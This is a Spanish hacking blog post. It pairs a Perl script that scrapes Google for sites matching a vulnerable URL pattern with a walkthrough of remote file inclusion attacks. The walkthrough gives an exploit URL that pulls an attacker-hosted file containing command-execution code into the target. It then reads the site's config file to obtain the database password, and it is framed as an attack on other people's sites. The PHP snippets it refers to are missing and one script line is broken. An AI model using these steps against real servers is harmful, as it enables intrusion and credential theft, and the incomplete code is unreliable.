Bueno este script lo cree cuando comense a programar con sockets en perl, le agradesco a la comunidad undersecurity que me ayudo mucho y en especial a mi amigo s[e]c.
Modo de uso
perl script.pl noticias.php 10
#Autor: Yoyahack<br />
<br />
use LWP::UserAgent;<br />
use HTTP::Request;<br />
<br />
print "Modo de uso:\n";<br />
print "Perl name.pl
print "perl name.pl inurl:noticias.php?id=1 50\n";<br />
<br />
my $ua = new LWP::UserAgent;<br />
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");<br />
<br />
for($i=1;$i<$ARGV[1];$i++){<br />
my $busqueda = new HTTP::Request GET =>"http://www.google.es/search?hl=es&q=.$ARGV[0].&start=$i&sa=N";<br />
my $resultado = $ua->request($busqueda);<br />
$ua->timeout(7);<br />
my $result = $resultado->content;<br />
<br />
while ($result =~ m/(.*?)<\/a>/g) {<br />
my ($enlace) = ($1);<br />
print "$enlace\n";<br />
}<br />
}<br />
#Agradesco a la comunidad undersecurity que me ayudo mucho en la elavoracion del code y a s[e]c que me ayudo con algunos #errorres
Que es Remoto file inclusión (RFI) ?
Remote file inclusión (Inclusión remota de archivo) esta vulnerabilidad que permite el enlace de
archivos remotos situados en otros servidores a causa de una mala programación de la página
que contiene la función include ().
Algunas funciones vulnerables a RFI son:
Include ()
Include_once ()
require ()
require_once ()
Por ejemplo:
En una parte del index.php esta este code:
Lo que hace este code es incluir archivos remotamente mediante la variable
$f.
www.pagina.com/index.php?f=caciones.php
Lo que esta haciendo es incluyendo archives mediante la variable f.
Entonces se explotaría de la siguiente forma:
www.pagina.com/index.php?f=http://tupagina.com/archivo.txt?
Bueno Recuerde que su code tiene que estar en extensión .txt .gif. .jpg etc.... menos en php
porque se ejecutaría en nuestro servidor.
Entonces creamos un archivo con extensión .txt y le ponemos el code que se ejecutaría en su
servidor, bueno en este caso yo le pondré este:
Que sirve para ejecutar comandos en el servidor y se explotaría de la siguiente manera:
www.pagina.com/index.php?page=http//www.tupafina.com/archivo.txt?cmd=cat
config
Lo que estaría viendo la configuración de la BD y poder sacar el password de la BD.
Wenas a todos, bienvenido a mi blog donde intentare compartir mis conocimientos con todas las personas que les interes.
Saludos.